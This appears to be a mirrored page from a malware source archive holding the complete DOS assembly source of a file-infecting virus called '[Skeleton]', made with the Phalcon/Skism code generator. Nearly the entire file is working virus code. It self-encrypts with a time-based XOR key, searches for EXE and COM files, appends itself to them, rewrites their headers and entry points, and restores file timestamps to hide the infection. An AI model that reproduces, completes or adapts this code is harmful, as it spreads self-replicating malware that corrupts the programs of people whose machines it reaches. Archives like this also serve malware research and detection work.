mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
303 lines
10 KiB
NASM
303 lines
10 KiB
NASM
|
; target.asm : [Skeleton] by Deke
|
||
|
; Created wik the Phalcon/Skism Mass-Produced Code Generator
|
||
|
; from the configuration file skeleton.cfg
|
||
|
|
||
|
.model tiny ; Handy directive
|
||
|
.code ; Virus code segment
|
||
|
org 100h ; COM file starting IP
|
||
|
|
||
|
id = 'DA' ; ID word for EXE infections
|
||
|
entry_point: db 0e9h,0,0 ; jmp decrypt
|
||
|
|
||
|
startvirus:
|
||
|
decrypt: ; handles encryption and decryption
|
||
|
patch_startencrypt:
|
||
|
mov bp,offset startencrypt ; start of decryption
|
||
|
mov ax,(offset heap - offset startencrypt)/2 ; iterations
|
||
|
decrypt_loop:
|
||
|
db 2eh,81h,76h,0 ; xor word ptr cs:[bp], xxxx
|
||
|
decrypt_value dw 0 ; initialised at zero for null effect
|
||
|
inc bp ; calculate new decryption location
|
||
|
inc bp
|
||
|
dec ax ; If we are not done, then
|
||
|
jnz decrypt_loop ; decrypt mo'
|
||
|
startencrypt:
|
||
|
call next ; calculate delta offset
|
||
|
next: pop bp ; bp = IP next
|
||
|
sub bp,offset next ; bp = delta offset
|
||
|
|
||
|
cmp sp,id ; COM or EXE?
|
||
|
je restoreEXE
|
||
|
restoreCOM:
|
||
|
lea si,[bp+offset save3]
|
||
|
mov di,100h
|
||
|
push di ; For later return
|
||
|
movsb
|
||
|
jmp short restoreEXIT
|
||
|
restoreEXE:
|
||
|
push ds
|
||
|
push es
|
||
|
push cs ; DS = CS
|
||
|
pop ds
|
||
|
push cs ; ES = CS
|
||
|
pop es
|
||
|
lea si,[bp+offset oldCSIP2]
|
||
|
lea di,[bp+offset oldCSIP]
|
||
|
movsw
|
||
|
movsw
|
||
|
movsw
|
||
|
restoreEXIT:
|
||
|
movsw
|
||
|
|
||
|
mov byte ptr [bp+numinfec],3 ; reset infection counter
|
||
|
|
||
|
mov ah,1Ah ; Set new DTA
|
||
|
lea dx,[bp+offset newDTA] ; new DTA @ DS:DX
|
||
|
int 21h
|
||
|
|
||
|
lea dx,[bp+offset exe_mask]
|
||
|
call infect_mask
|
||
|
lea dx,[bp+offset com_mask]
|
||
|
call infect_mask
|
||
|
|
||
|
done_infections:
|
||
|
mov ah,1ah ; restore DTA to default
|
||
|
mov dx,80h ; DTA in PSP
|
||
|
cmp sp,id-4 ; EXE or COM?
|
||
|
jz returnEXE
|
||
|
returnCOM:
|
||
|
int 21h
|
||
|
retn ; 100h is on stack
|
||
|
returnEXE:
|
||
|
pop es
|
||
|
pop ds
|
||
|
int 21h
|
||
|
mov ax,es ; AX = PSP segment
|
||
|
add ax,10h ; Adjust for PSP
|
||
|
add word ptr cs:[bp+oldCSIP+2],ax
|
||
|
add ax,word ptr cs:[bp+oldSSSP+2]
|
||
|
cli ; Clear intrpts for stack manipulation
|
||
|
mov sp,word ptr cs:[bp+oldSSSP]
|
||
|
mov ss,ax
|
||
|
sti
|
||
|
db 0eah ; jmp ssss:oooo
|
||
|
oldCSIP db ? ; Original CS:IP (4 bytes)
|
||
|
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
|
||
|
oldSSSP dd ? ; Original SS:SP
|
||
|
oldCSIP2 dd ?
|
||
|
oldSSSP2 dd ?
|
||
|
|
||
|
creator db '[MPC]',0 ; Mass Produced Code Generator
|
||
|
virus db '[Skeleton]',0
|
||
|
author db 'Deke',0
|
||
|
|
||
|
infect_mask:
|
||
|
mov ah,4eh ; find first file
|
||
|
mov cx,7 ; any attribute
|
||
|
findfirstnext:
|
||
|
int 21h ; DS:DX points to mask
|
||
|
jc exit_infect_mask ; No mo files found
|
||
|
|
||
|
xor cx,cx ; Clear attributes
|
||
|
call attributes ; Set file attributes
|
||
|
|
||
|
mov ax,3d02h ; Open read/write
|
||
|
int 21h
|
||
|
xchg ax,bx
|
||
|
|
||
|
mov ah,3fh ; Read file to buffer
|
||
|
lea dx,[bp+offset buffer] ; @ DS:DX
|
||
|
mov cx,1Ah ; 1Ah bytes
|
||
|
int 21h
|
||
|
|
||
|
mov ax,4202h ; Go to end of file
|
||
|
xor cx,cx
|
||
|
cwd
|
||
|
int 21h
|
||
|
|
||
|
cmp word ptr [bp+buffer],'ZM'; EXE?
|
||
|
jz checkEXE ; Why yes, yes it is!
|
||
|
checkCOM:
|
||
|
mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
|
||
|
cmp ax,65535-(endheap-decrypt) ; Is it too large?
|
||
|
ja find_next
|
||
|
|
||
|
mov cx,word ptr [bp+buffer+1]; get jmp location
|
||
|
add cx,heap-startvirus+3 ; Adjust for virus size
|
||
|
cmp ax,cx ; Already infected?
|
||
|
je find_next
|
||
|
jmp infect_com
|
||
|
checkEXE:
|
||
|
cmp word ptr [bp+buffer+10h],id ; is it already infected?
|
||
|
jnz infect_exe
|
||
|
done_file:
|
||
|
mov ax,5701h ; Restore creation date/time
|
||
|
mov cx,word ptr [bp+newDTA+16h] ; time
|
||
|
mov dx,word ptr [bp+newDTA+18h] ; date
|
||
|
int 21h
|
||
|
|
||
|
mov ah,3eh ; Close file
|
||
|
int 21h
|
||
|
|
||
|
mov ch,0
|
||
|
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
|
||
|
call attributes ; attributes
|
||
|
|
||
|
cmp byte ptr [bp+numinfec], 0; Enough infections?
|
||
|
jnz find_next
|
||
|
pop ax ; remove call from stack
|
||
|
jmp done_infections
|
||
|
|
||
|
find_next:
|
||
|
mov ah,4fh ; find next file
|
||
|
jmp short findfirstnext
|
||
|
exit_infect_mask: ret
|
||
|
|
||
|
infect_exe:
|
||
|
mov cx, 1ah
|
||
|
push cx
|
||
|
push bx ; Save file handle
|
||
|
les ax,dword ptr [bp+buffer+14h] ; Save old entry point
|
||
|
mov word ptr [bp+oldCSIP2], ax
|
||
|
mov word ptr [bp+oldCSIP2+2], es
|
||
|
|
||
|
les ax,dword ptr [bp+buffer+0Eh] ; Save old stack
|
||
|
mov word ptr [bp+oldSSSP2],es
|
||
|
mov word ptr [bp+oldSSSP2+2],ax
|
||
|
|
||
|
mov ax,word ptr [bp+buffer+8]; Get header size
|
||
|
mov cl, 4 ; convert to bytes
|
||
|
shl ax, cl
|
||
|
xchg ax, bx
|
||
|
|
||
|
les ax,dword ptr [bp+newDTA+26] ; Get file size
|
||
|
mov dx, es ; to DX:AX
|
||
|
push ax
|
||
|
push dx
|
||
|
|
||
|
sub ax, bx ; Subtract header size from
|
||
|
sbb dx, 0 ; file size
|
||
|
|
||
|
mov cx, 10h ; Convert to segment:offset
|
||
|
div cx ; form
|
||
|
|
||
|
mov word ptr [bp+buffer+14h], dx ; New entry point
|
||
|
mov word ptr [bp+buffer+16h], ax
|
||
|
|
||
|
mov word ptr [bp+buffer+0Eh], ax ; and stack
|
||
|
mov word ptr [bp+buffer+10h], id
|
||
|
|
||
|
pop dx ; get file length
|
||
|
pop ax
|
||
|
pop bx ; Restore file handle
|
||
|
|
||
|
add ax, heap-startvirus ; add virus size
|
||
|
adc dx, 0
|
||
|
|
||
|
mov cl, 9
|
||
|
push ax
|
||
|
shr ax, cl
|
||
|
ror dx, cl
|
||
|
stc
|
||
|
adc dx, ax
|
||
|
pop ax
|
||
|
and ah, 1 ; mod 512
|
||
|
|
||
|
mov word ptr [bp+buffer+4], dx ; new file size
|
||
|
mov word ptr [bp+buffer+2], ax
|
||
|
|
||
|
push cs ; restore ES
|
||
|
pop es
|
||
|
|
||
|
mov ax,word ptr [bp+buffer+14h] ; needed later
|
||
|
jmp short finishinfection
|
||
|
infect_com: ; ax = filesize
|
||
|
mov cx,3
|
||
|
push cx
|
||
|
sub ax,cx
|
||
|
lea si,[bp+offset buffer]
|
||
|
lea di,[bp+offset save3]
|
||
|
movsw
|
||
|
movsb
|
||
|
mov byte ptr [si-3],0e9h
|
||
|
mov word ptr [si-2],ax
|
||
|
add ax,103h
|
||
|
finishinfection:
|
||
|
add ax,offset startencrypt-offset decrypt
|
||
|
push ax
|
||
|
|
||
|
mov ah,2ch ; Get current time
|
||
|
int 21h ; dh=sec,dl=1/100 sec
|
||
|
mov [bp+decrypt_value],dx ; Set new encryption value
|
||
|
lea di,[bp+offset codestore]
|
||
|
mov al,55h ; push bp
|
||
|
stosb
|
||
|
lea si,[bp+offset decrypt] ; Copy encryption function
|
||
|
mov cx,startencrypt-decrypt ; Bytes to move
|
||
|
push si ; Save for later use
|
||
|
push cx
|
||
|
rep movsb
|
||
|
|
||
|
lea si,[bp+offset write] ; Copy writing function
|
||
|
mov cx,endwrite-write ; Bytes to move
|
||
|
rep movsb
|
||
|
pop cx
|
||
|
pop si
|
||
|
pop ax
|
||
|
push di
|
||
|
push si
|
||
|
push cx
|
||
|
rep movsb ; Copy decryption function
|
||
|
|
||
|
mov word ptr [bp+patch_startencrypt+1],ax
|
||
|
|
||
|
mov al,5dh ; pop bx
|
||
|
stosb
|
||
|
mov al,0c3h ; retn
|
||
|
stosb
|
||
|
|
||
|
call codestore ; decryption
|
||
|
pop cx
|
||
|
pop di
|
||
|
pop si
|
||
|
rep movsb ; Restore decryption function
|
||
|
|
||
|
mov ax,4200h ; Move file pointer
|
||
|
xor cx,cx ; to beginning of file
|
||
|
cwd ; xor dx,dx
|
||
|
int 21h
|
||
|
|
||
|
mov ah,40h ; Write to file
|
||
|
lea dx,[bp+offset buffer] ; Write from buffer
|
||
|
pop cx ; cx bytes
|
||
|
int 21h
|
||
|
|
||
|
dec byte ptr [bp+numinfec] ; One mo infection
|
||
|
jmp done_file
|
||
|
|
||
|
attributes:
|
||
|
mov ax,4301h ; Set attributes to cx
|
||
|
lea dx,[bp+offset newDTA+30] ; filename in DTA
|
||
|
int 21h
|
||
|
ret
|
||
|
|
||
|
write:
|
||
|
pop bp ; Restore relativeness
|
||
|
mov ah,40h ; Write to file
|
||
|
lea dx,[bp+offset decrypt] ; Concatenate virus
|
||
|
mov cx,heap-decrypt ; # bytes to write
|
||
|
int 21h
|
||
|
push bp
|
||
|
endwrite:
|
||
|
|
||
|
exe_mask db '*.exe',0
|
||
|
com_mask db '*.com',0
|
||
|
heap: ; Variables not in code
|
||
|
; The following code is the buffer for the write function
|
||
|
codestore:db (startencrypt-decrypt)*2+(endwrite-write)+3 dup (?)
|
||
|
newDTA db 43 dup (?) ; Temporary DTA
|
||
|
numinfec db ? ; Infections this run
|
||
|
buffer db 1ah dup (?) ; read buffer
|
||
|
endheap: ; End of virus
|
||
|
end entry_point
|